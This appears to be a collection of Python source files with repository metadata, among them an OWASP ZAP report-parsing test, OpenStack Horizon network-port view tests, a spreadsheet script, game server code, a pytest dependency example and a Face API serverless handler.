| code (string, length 2–1.05M) | repo_name (string, length 5–104) | path (string, length 4–251) | language (1 class) | license (15 classes) | size (int32, 2–1.05M) |
|---|---|---|---|---|---|
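
Each record below is one row of that schema: the file's code, then a separator line carrying its repo_name, path, language, license, and size. As a minimal, hedged sketch of consuming rows with this schema (assuming a Hugging Face-style `datasets` layout; the dataset name below is a placeholder, not taken from this dump):

    from datasets import load_dataset

    # Hypothetical dataset name; the columns match the table above.
    ds = load_dataset("example/python-files", split="train")
    apache = ds.filter(lambda row: row["license"] == "apache-2.0")
    for row in apache.select(range(3)):
        print(row["repo_name"], row["path"], row["size"])
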
"""Unit tests for the OWASP ZAP security warnings collector."""
from collector_utilities.functions import md5_hash
from .base import OWASPZAPTestCase
class OWASPZAPSecurityWarningsTest(OWASPZAPTestCase):
"""Unit tests for the OWASP ZAP security warnings collector."""
METRIC_TYPE = "security_warnings"
OWASP_ZAP_XML = """<?xml version="1.0"?>
<OWASPZAPReport version="2.7.0" generated="Thu, 28 Mar 2019 13:20:20">
<site name="http://www.hackazon.com" host="www.hackazon.com" port="80" ssl="false">
<alerts>
<alertitem>
<pluginid>10021</pluginid>
<alert>X-Content-Type-Options Header Missing</alert>
<name>X-Content-Type-Options Header Missing</name>
<riskcode>1</riskcode>
<confidence>2</confidence>
<riskdesc>Low (Medium)</riskdesc>
<desc><p>The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.</desc>
<instances>
<instance>
<uri>http://www.hackazon.com/products_pictures/Ray_Ban.jpg</uri>
<method>GET</method>
<param>X-Content-Type-Options</param>
</instance>
<instance>
<uri>http://www.hackazon.com/products_pictures/How_to_Marry_a_Millionaire.jpg</uri>
<method>GET</method>
<param>X-Content-Type-Options</param>
</instance>
</instances>
<count>759</count>
<solution><p>Ensure that the application/web server sets the Content-Type header appropriately</solution>
<otherinfo><p>This issue still applies to error type pages</otherinfo>
<reference><p>http://msdn.microsoft.com/en-us/library/ie/gg622941%28v</reference>
<cweid>16</cweid>
<wascid>15</wascid>
<sourceid>3</sourceid>
</alertitem>
</alerts>
</site>
</OWASPZAPReport>"""
WARNING_NAME = "X-Content-Type-Options Header Missing"
WARNING_DESCRIPTION = "The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'."
WARNING_RISK = "Low (Medium)"
async def test_alert_instances(self):
"""Test that the number of alert instances is returned."""
response = await self.collect(get_request_text=self.OWASP_ZAP_XML)
url1 = "http://www.hackazon.com/products_pictures/Ray_Ban.jpg"
url2 = "http://www.hackazon.com/products_pictures/How_to_Marry_a_Millionaire.jpg"
expected_entities = [
dict(
key=md5_hash(f"X-Content-Type-Options Header Missing:10021:16:15:GET:{url1}"),
name=self.WARNING_NAME,
description=self.WARNING_DESCRIPTION,
location=f"GET {url1}",
uri=url1,
risk=self.WARNING_RISK,
),
dict(
key=md5_hash(f"X-Content-Type-Options Header Missing:10021:16:15:GET:{url2}"),
name=self.WARNING_NAME,
description=self.WARNING_DESCRIPTION,
location=f"GET {url2}",
uri=url2,
risk=self.WARNING_RISK,
),
]
self.assert_measurement(response, value="2", entities=expected_entities)
async def test_alert_types(self):
"""Test that the number of alert types is returned."""
self.set_source_parameter("alerts", "alert types")
response = await self.collect(get_request_text=self.OWASP_ZAP_XML)
expected_entities = [
dict(
key=md5_hash("X-Content-Type-Options Header Missing:10021:16:15"),
name=self.WARNING_NAME,
description=self.WARNING_DESCRIPTION,
risk=self.WARNING_RISK,
),
]
self.assert_measurement(response, value="1", entities=expected_entities)
async def test_variable_url_regexp(self):
"""Test that parts of URLs can be ignored."""
self.set_source_parameter("variable_url_regexp", ["[A-Za-z_]+.jpg"])
response = await self.collect(get_request_text=self.OWASP_ZAP_XML)
stable_url = "http://www.hackazon.com/products_pictures/variable-part-removed"
expected_entities = [
dict(
key=md5_hash(f"X-Content-Type-Options Header Missing:10021:16:15:GET:{stable_url}"),
name=self.WARNING_NAME,
uri=stable_url,
description=self.WARNING_DESCRIPTION,
location=f"GET {stable_url}",
risk=self.WARNING_RISK,
)
]
self.assert_measurement(response, value="1", entities=expected_entities)
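# A hedged, self-contained sketch (not the collector's real code) of the two
# ideas the tests above exercise: masking variable URL parts with a regular
# expression before keying, and deriving an entity key from an md5 of the
# alert's identifying fields. The replacement text "variable-part-removed" and
# the "name:pluginid:cweid:wascid:method:uri" key layout come from the expected
# values above; hashlib stands in for collector_utilities' md5_hash.
import hashlib
import re
def stable_entity_key(name, plugin_id, cwe_id, wasc_id, method, uri, variable_url_regexp=None):
    """Return (entity key, stabilized uri), masking variable URL parts first."""
    if variable_url_regexp:
        uri = re.sub(variable_url_regexp, "variable-part-removed", uri)
    key_fields = f"{name}:{plugin_id}:{cwe_id}:{wasc_id}:{method}:{uri}"
    return hashlib.md5(key_fields.encode()).hexdigest(), uri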
| ICTU/quality-time | components/collector/tests/source_collectors/owasp_zap/test_security_warnings.py | Python | apache-2.0 | 5,009 |
# Copyright 2012 NEC Corporation
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django import http
from mox3.mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
DETAIL_URL = 'horizon:admin:networks:ports:detail'
NETWORKS_INDEX_URL = reverse('horizon:admin:networks:index')
NETWORKS_DETAIL_URL = 'horizon:admin:networks:detail'
class NetworkPortTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('network_get',
'port_get',
'is_extension_supported',)})
def test_port_detail(self):
self._test_port_detail()
@test.create_stubs({api.neutron: ('network_get',
'port_get',
'is_extension_supported',)})
def test_port_detail_with_mac_learning(self):
self._test_port_detail(mac_learning=True)
def _test_port_detail(self, mac_learning=False):
port = self.ports.first()
network_id = self.networks.first().id
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(self.ports.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.MultipleTimes().AndReturn(mac_learning)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'allowed-address-pairs') \
.MultipleTimes().AndReturn(False)
api.neutron.network_get(IsA(http.HttpRequest), network_id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
res = self.client.get(reverse(DETAIL_URL, args=[port.id]))
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['port'].id, port.id)
@test.create_stubs({api.neutron: ('port_get',)})
def test_port_detail_exception(self):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
res = self.client.get(reverse(DETAIL_URL, args=[port.id]))
redir_url = NETWORKS_INDEX_URL
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get(self):
self._test_port_create_get()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get_with_mac_learning(self):
self._test_port_create_get(mac_learning=True)
def _test_port_create_get(self, mac_learning=False, binding=False):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:addport',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/create.html')
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post(self):
self._test_port_create_post()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post_with_mac_learning(self):
self._test_port_create_post(mac_learning=True, binding=False)
def _test_port_create_post(self, mac_learning=False, binding=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = \
port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception(self):
self._test_port_create_post_exception()
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception_with_mac_learning(self):
self._test_port_create_post_exception(mac_learning=True)
def _test_port_create_post_exception(self, mac_learning=False,
binding=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'mac_state': True,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_learning_enabled'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get(self):
self._test_port_update_get()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get_with_mac_learning(self):
self._test_port_update_get(mac_learning=True)
def _test_port_update_get(self, mac_learning=False, binding=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest),
port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/update.html')
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post(self):
self._test_port_update_post()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_with_mac_learning(self):
self._test_port_update_post(mac_learning=True)
def _test_port_update_post(self, mac_learning=False, binding=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception(self):
self._test_port_update_post_exception()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception_with_mac_learning(self):
self._test_port_update_post_exception(mac_learning=True, binding=False)
def _test_port_update_post_exception(self, mac_learning=False,
binding=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete(self):
self._test_port_delete()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_with_mac_learning(self):
self._test_port_delete(mac_learning=True)
def _test_port_delete(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'network-ip-availability').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse(NETWORKS_DETAIL_URL, args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_exception(self):
self._test_port_delete_exception()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks')})
def test_port_delete_exception_with_mac_learning(self):
self._test_port_delete_exception(mac_learning=True)
def _test_port_delete_exception(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.port_delete(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'network-ip-availability').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse(NETWORKS_DETAIL_URL, args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
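# A hedged, minimal illustration (separate from the tests above) of the mox3
# record/replay/verify cycle they rely on: stub out a method, record the exact
# expected calls with canned return values, switch to replay mode, exercise
# the code under test, then verify that every recorded call happened.
from mox3 import mox as _mox
class _DemoApi(object):
    def port_get(self, port_id):
        raise NotImplementedError("replaced by the stub in _mox_demo")
def _mox_demo():
    m = _mox.Mox()
    api = _DemoApi()
    m.StubOutWithMock(api, 'port_get')
    api.port_get('p1').AndReturn({'id': 'p1'})  # record phase
    m.ReplayAll()                               # switch to replay phase
    result = api.port_get('p1')                 # code under test
    m.VerifyAll()                               # every recorded call happened
    m.UnsetStubs()
    return result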
| wolverineav/horizon | openstack_dashboard/dashboards/admin/networks/ports/tests.py | Python | apache-2.0 | 20,198 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import xlrd
import xlwt
import datetime
def request():
sheet = xlrd.open_workbook(os.path.join('E:/w/', '修改工单.xls')).sheet_by_index(0)
nRow = sheet.nrows
nCol = sheet.ncols
title = []
rowDatas = {}
for i in range(nRow):
        # Header row
if(i == 0):
for j in range(nCol):
title.append(sheet.cell_value(i, j))
else:
oneItem = []
for j in range(nCol):
oneItem.append(sheet.cell_value(i, j))
key = sheet.cell_value(i, 9)
rowData = rowDatas.get(key)
if rowData is None:
rowData = []
rowData.append(oneItem)
rowDatas[key] = rowData
else:
rowData.append(oneItem)
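    # Status strings written to column 25 are kept in the original Chinese:
    #   '未倒回' = "not reverted", '已倒回' = "reverted",
    #   '超时倒回' = "reverted too late" (more than 5 days apart).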
for key, rowData in rowDatas.items():
if(len(rowData) == 1):
for oneItem in rowData:
oneItem[25] = '未倒回'
else:
            rowData.sort(key=lambda e: e[1])
rowData[0][25] = '未倒回'
rowData[len(rowData)-1][25] = '未倒回'
for i in range(len(rowData)-1):
if rowData[i][15] == rowData[i + 1][16]:
orgDate = datetime.datetime.strptime('{:.0f}'.format(rowData[i][1]), '%Y%m%d')
targetDate = datetime.datetime.strptime('{:.0f}'.format(rowData[i + 1][1]), '%Y%m%d')
diffDay = targetDate - orgDate
if diffDay.days >= 0 and diffDay.days <= 5:
rowData[i][25] = '已倒回'
rowData[i + 1][25] = '已倒回'
else:
rowData[i][25] = '超时倒回'
rowData[i + 1][25] = '超时倒回'
writeBook = xlwt.Workbook()
writeSheet = writeBook.add_sheet('Sheet0')
for i in range(len(title)):
writeSheet.write(0, i, title[i])
    # Write all rows out to one result file
rowIndex = 1
for key, rowData in rowDatas.items():
for oneItem in rowData:
for j in range(nCol):
writeSheet.write(rowIndex, j, oneItem[j])
rowIndex += 1
    # xlwt writes legacy BIFF (.xls) files, so save with a matching .xls
    # extension (the original '.xlsx' name mislabels the format)
    writeBook.save(os.path.join('E:/w/', '修改工单-结果.xls'))
if __name__ == '__main__':
request()
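# A hedged, standalone restatement (hypothetical data, same rule) of the
# matching logic above, reusing the datetime import at the top of this file:
# within a group sorted by its yyyymmdd date column, two adjacent rows count
# as reverted when the second follows the first by 0-5 days, and as reverted
# too late otherwise.
def classify_pair(date1, date2, max_days=5):
    d1 = datetime.datetime.strptime(str(date1), '%Y%m%d')
    d2 = datetime.datetime.strptime(str(date2), '%Y%m%d')
    diff = (d2 - d1).days
    return 'reverted' if 0 <= diff <= max_days else 'reverted too late'
# classify_pair(20200101, 20200104) -> 'reverted'
# classify_pair(20200101, 20200110) -> 'reverted too late'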
| tiandizhiguai/test | src/main/java/com/test/python/data_test4.py | Python | apache-2.0 | 2,395 |
from toontown.coghq import DistributedLevelBattleAI
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import State
from direct.fsm import ClassicFSM, State
from toontown.battle.BattleBase import *
import CogDisguiseGlobals
from toontown.toonbase.ToonPythonUtil import addListsByValue
class DistributedBattleFactoryAI(DistributedLevelBattleAI.DistributedLevelBattleAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedBattleFactoryAI')
def __init__(self, air, battleMgr, pos, suit, toonId, zoneId, level, battleCellId, roundCallback = None, finishCallback = None, maxSuits = 4):
DistributedLevelBattleAI.DistributedLevelBattleAI.__init__(self, air, battleMgr, pos, suit, toonId, zoneId, level, battleCellId, 'FactoryReward', roundCallback, finishCallback, maxSuits)
self.battleCalc.setSkillCreditMultiplier(1)
if self.bossBattle:
self.level.d_setForemanConfronted(toonId)
self.fsm.addState(State.State('FactoryReward', self.enterFactoryReward, self.exitFactoryReward, ['Resume']))
playMovieState = self.fsm.getStateNamed('PlayMovie')
playMovieState.addTransition('FactoryReward')
def getTaskZoneId(self):
return self.level.factoryId
def handleToonsWon(self, toons):
for toon in toons:
recovered, notRecovered = self.air.questManager.recoverItems(toon, self.suitsKilled, self.getTaskZoneId())
self.toonItems[toon.doId][0].extend(recovered)
self.toonItems[toon.doId][1].extend(notRecovered)
meritArray = self.air.promotionMgr.recoverMerits(toon, self.suitsKilled, self.getTaskZoneId(), getFactoryMeritMultiplier(self.getTaskZoneId()))
if toon.doId in self.helpfulToons:
self.toonMerits[toon.doId] = addListsByValue(self.toonMerits[toon.doId], meritArray)
else:
self.notify.debug('toon %d not helpful, skipping merits' % toon.doId)
if self.bossBattle:
self.toonParts[toon.doId] = self.air.cogSuitMgr.recoverPart(toon, self.level.factoryType, self.suitTrack, self.getTaskZoneId(), toons)
self.notify.debug('toonParts = %s' % self.toonParts)
def enterFactoryReward(self):
self.joinableFsm.request('Unjoinable')
self.runableFsm.request('Unrunable')
self.resetResponses()
self.assignRewards()
self.bossDefeated = 1
self.level.setVictors(self.activeToons[:])
self.timer.startCallback(BUILDING_REWARD_TIMEOUT, self.serverRewardDone)
return None
def exitFactoryReward(self):
return None
def enterResume(self):
DistributedLevelBattleAI.DistributedLevelBattleAI.enterResume(self)
if self.bossBattle and self.bossDefeated:
self.battleMgr.level.b_setDefeated()
| silly-wacky-3-town-toon/SOURCE-COD | toontown/coghq/DistributedBattleFactoryAI.py | Python | apache-2.0 | 2,839 |
#!/usr/bin/python
from light import Light
light = Light()
print light.getstate()
| bettse/hue | dump.py | Python | apache-2.0 | 82 |
"""
Copyright 2014-2016 University of Illinois
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
file: rules/tests.py
Author: Jon Gunderson
"""
from __future__ import absolute_import
from django.test import TestCase
# Create your tests here.
| opena11y/fae2 | fae2/rules/tests.py | Python | apache-2.0 | 722 |
import pytest
# Test data
# Consider a bunch of Nodes, some of them are parents and some are children.
class Node(object):
NodeMap = {}
def __init__(self, name, parent=None):
self.name = name
self.children = []
self.NodeMap[self.name] = self
if parent:
self.parent = self.NodeMap[parent]
self.parent.children.append(self)
else:
self.parent = None
def __str__(self):
return self.name
parents = [ Node("a"), Node("b"), Node("c"), Node("d"), ]
childs = [ Node("e", "a"), Node("f", "a"), Node("g", "a"),
Node("h", "b"), Node("i", "c"), Node("j", "c"),
Node("k", "d"), Node("l", "d"), Node("m", "d"), ]
# The test for the parent shall depend on the test of all its children.
# Create enriched parameter lists, decorated with the dependency marker.
childparam = [
pytest.param(c, marks=pytest.mark.dependency(name="test_child[%s]" % c))
for c in childs
]
parentparam = [
pytest.param(p, marks=pytest.mark.dependency(
name="test_parent[%s]" % p,
depends=["test_child[%s]" % c for c in p.children]
)) for p in parents
]
@pytest.mark.parametrize("c", childparam)
def test_child(c):
if c.name == "l":
pytest.xfail("deliberate fail")
assert False
@pytest.mark.parametrize("p", parentparam)
def test_parent(p):
pass
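# A hedged note on the expected outcome (pytest-dependency semantics, under
# the assumption that an xfail does not count as a pass): test_child[l]
# xfails above, so test_parent[d], which depends on it, should be skipped,
# while the other parents run because all of their children passed.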
| RKrahl/pytest-dependency | doc/examples/dyn-parametrized.py | Python | apache-2.0 | 1,397 |
# -*- coding:utf-8 -*-
from application import app
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True)
| oceanio/flask-boot | server.py | Python | apache-2.0 | 130 |
# Copyright 2017 The Nuclio Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Uses Microsoft's Face API to extract face information from the
# picture whose URL is submitted in the request body. The result is
# returned as a table of face objects sorted by their center's
# position in the given picture, left-to-right and then top-to-bottom.
#
# You will need a valid key from Microsoft:
# https://azure.microsoft.com/en-gb/try/cognitive-services/?api=face-api
#
# Once a valid Face API key has been acquired, set it and the appropriate
# regional base URL as the environment for this function
# (in the config section).
#
# We can also configure the function inline - through a specially crafted
# comment such as the below. This is functionally equivalent to creating
# a function.yaml file.
import os
import cognitive_face as cf
import tabulate
import inflection
def handler(context, event):
# extract the stuff we need
image_url = event.body.decode('utf-8').strip()
key = os.environ.get('FACE_API_KEY')
base_url = os.environ.get('FACE_API_BASE_URL')
if key is None:
context.logger.warn('Face API key not set, cannot continue')
return _build_response(context, 'Function misconfigured: Face API key not set', 503)
if base_url is None:
context.logger.warn('Face API base URL not set, cannot continue')
return _build_response(context, 'Function misconfigured: Face API base URL not set', 503)
if not image_url:
context.logger.warn('No URL given in request body')
return _build_response(context, 'Image URL required', 400)
# configure cognitive face wrapper
cf.Key.set(key)
cf.BaseUrl.set(base_url)
# attempt to request using the provided info
try:
context.logger.info('Requesting detection from Face API: {0}'.format(image_url))
detected_faces = cf.face.detect(image_url,
face_id=False,
attributes='age,gender,glasses,smile,emotion')
except Exception as error:
context.logger.warn('Face API error occurred: {0}'.format(error))
return _build_response(context, 'Face API error occurred', 503)
parsed_faces = []
# determine the center point of each detected face and map it to its attributes,
    # as well as clean up the retrieved data for viewing comfort
for face in detected_faces:
coordinates = face['faceRectangle']
attributes = face['faceAttributes']
center_x = coordinates['left'] + coordinates['width'] / 2
center_y = coordinates['top'] + coordinates['height'] / 2
# determine the primary emotion based on its weighing
primary_emotion = sorted(attributes['emotion'].items(), key=lambda item: item[1])[-1][0]
parsed_face = {
'x': center_x,
'y': center_y,
'position': '({0},{1})'.format(int(center_x), int(center_y)),
'gender': inflection.humanize(attributes['gender']),
'age': int(attributes['age']),
'glasses': inflection.humanize(inflection.underscore(attributes['glasses'])),
'primary_emotion': inflection.humanize(primary_emotion),
'smile': '{0:.1f}%'.format(attributes['smile'] * 100),
}
parsed_faces.append(parsed_face)
# sort according to center point, first x then y
parsed_faces.sort(key=lambda face: (face['x'], face['y']))
# prepare the data for tabulation
first_row = ('',) + tuple(face['position'] for face in parsed_faces)
make_row = lambda name: (inflection.humanize(name),) + tuple(
face[name] for face in parsed_faces)
other_rows = [make_row(name) for name in [
'gender', 'age', 'primary_emotion', 'glasses', 'smile']]
# return the human-readable face data in a neat table format
return _build_response(context,
tabulate.tabulate([first_row] + other_rows,
headers='firstrow',
tablefmt='fancy_grid',
numalign='center',
stralign='center'),
200)
def _build_response(context, body, status_code):
return context.Response(body=body,
headers={},
content_type='text/plain',
status_code=status_code)
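# A hedged local-testing sketch (not part of nuclio's runtime): stand-in
# context/event objects exposing only the attributes the handler touches
# (event.body, context.logger, context.Response). All names are hypothetical.
import logging as _logging
class _FakeResponse(object):
    def __init__(self, body, headers, content_type, status_code):
        self.body = body
        self.status_code = status_code
class _FakeContext(object):
    logger = _logging.getLogger('face-demo')
    Response = _FakeResponse
class _FakeEvent(object):
    def __init__(self, body):
        self.body = body
# Example: with FACE_API_KEY unset, handler() should return a 503 response:
# handler(_FakeContext(), _FakeEvent(b'http://example.com/img.jpg')).status_code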
| nuclio/nuclio | hack/examples/python/facerecognizer/face.py | Python | apache-2.0 | 5,037 |
# Copyright 2014 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
